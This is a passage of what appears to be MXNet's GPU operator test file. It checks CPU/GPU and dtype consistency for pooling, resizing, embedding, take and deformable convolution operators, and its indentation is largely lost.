# Testing of the 'v1' pooling operator is over its restricted support domain of
# 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are
# always tested against each other, and sometimes against the standard operator versions.
# The slightly different 'v1' definition prevents this in the following cases:
#
# 1. In max pooling, when multiple input values are the maximum in the input window,
# the 'v1' implementation backprops the gradient to all maxima, whereas the standard
# pooling operator backprops the gradient to the lowest-indexed maximum only.
# 2. In max pooling, the 'v1' operator pads with 0's and this value can become the
# maximum output value in the case of an all-negative input. The standard pooling
# operator effectively considers the padding to be the largest negative value, so
# only input values should appear in the output.
# 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor,
# even at the edges, and so does not support count_include_pad = False.
# 4. The float16 'v1' pooling operator performs forward sums and averages in
# float16, whereas the std operators perform those calculations in float32, so
# greater float16 tolerances are needed when comparing across implementations.
        # Double the float16 tol when comparing v1 and non-v1 implementations, per note 4 above.
relaxed_tol = {np.dtype(np.float16): 2e-1,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0}
# Exclude std implementations due to points 1 and 2 above.
test_pooling_dim('2D', 'max', dtype, v1_pool_op_list)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True,
tol=relaxed_tol)
# Exclude std implementations due to point 3 above.
test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol)
# We can compare the standard and 'v1' max pooling implementations if we eliminate padding
# (see point 2 above) and use np.float64 data so that no two random input window values are
# likely to be the same (see point 1 above).
test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list)
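# A numpy-only sketch (added helper, not invoked by the tests) of note 3 in the comment
# block above: for average pooling over a window that overlaps padding,
# count_include_pad=True divides by the full kernel size while count_include_pad=False
# divides only by the number of valid (unpadded) inputs.
def _illustrate_count_include_pad():
    import numpy as np
    row = np.array([2.0, 4.0])
    padded = np.concatenate(([0.0], row, [0.0]))  # pad=1 on both ends of a 1D row
    window = padded[0:2]                          # first kernel=2 window: [pad, 2.0]
    avg_include_pad = window.sum() / 2.0          # divide by kernel size      -> 1.0
    avg_exclude_pad = window.sum() / 1.0          # divide by #valid elements  -> 2.0
    assert (avg_include_pad, avg_exclude_pad) == (1.0, 2.0)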
@with_seed()
def test_pooling_full_2d():
def test_pooling_full_2d_type(pool_type):
data = (2, 2, 10, 10)
kernel = (4, 5)
pad = (1, 2)
stride = (3, 4)
convention = 'full'
ctx_list = []
sym_list = []
# o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4
# o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
check_consistency(sym_list, ctx_list)
test_pooling_full_2d_type('max')
test_pooling_full_2d_type('avg')
test_pooling_full_2d_type('sum')
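# An added helper (illustrative only, not used by the tests): output extent along one axis
# for the 'valid' (floor) and 'full' (ceil) pooling conventions, matching the o_h/o_w
# arithmetic worked out in the comments of test_pooling_full_2d above.
def _pooled_extent(in_size, kernel, pad, stride, convention='valid'):
    import math
    span = in_size + 2 * pad - kernel
    if convention == 'full':
        return int(math.ceil(span / float(stride))) + 1
    return span // stride + 1
assert _pooled_extent(10, 4, 1, 3, 'full') == 4 and _pooled_extent(10, 5, 2, 4, 'full') == 4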
@with_seed()
@pytest.mark.serial
def test_flatten_slice_after_conv():
ctx_list = []
data = mx.sym.Variable('conv_data')
conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1))
flatten = mx.symbol.flatten(data=conv)
slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1)
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}]
check_consistency(slice_sym, ctx_list)
@with_seed()
def test_bilinear_resize_op():
ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}]
data = mx.sym.Variable('data')
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=False)
check_consistency(sym, ctx_list)
@with_seed()
@pytest.mark.serial
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
@pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine',
reason="Testing with naive engine consistently triggers illegal memory access. Tracked in #17713")
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list, use_uniform=True)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
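# A numpy-only sketch (added helper, not run here) of the gather that test_take_with_type
# checks: along the default axis, output row i is data[indices[i]], which is also why only
# 'take_a' receives a gradient above while 'take_indices' uses grad_req='null'.
def _illustrate_take_gather():
    import numpy as np
    a = np.array([[10., 11.], [20., 21.], [30., 31.]])
    indices = np.array([2, 0])
    gathered = np.take(a, indices, axis=0)
    assert (gathered == np.array([[30., 31.], [10., 11.]])).all()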
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
mx.test_utils.assert_allclose(mod1.get_outputs()[0], mod2.get_outputs()[0], rtol=1e-2, atol=1e-4)
@with_seed()
@pytest.mark.serial
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
# Pad > 0
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
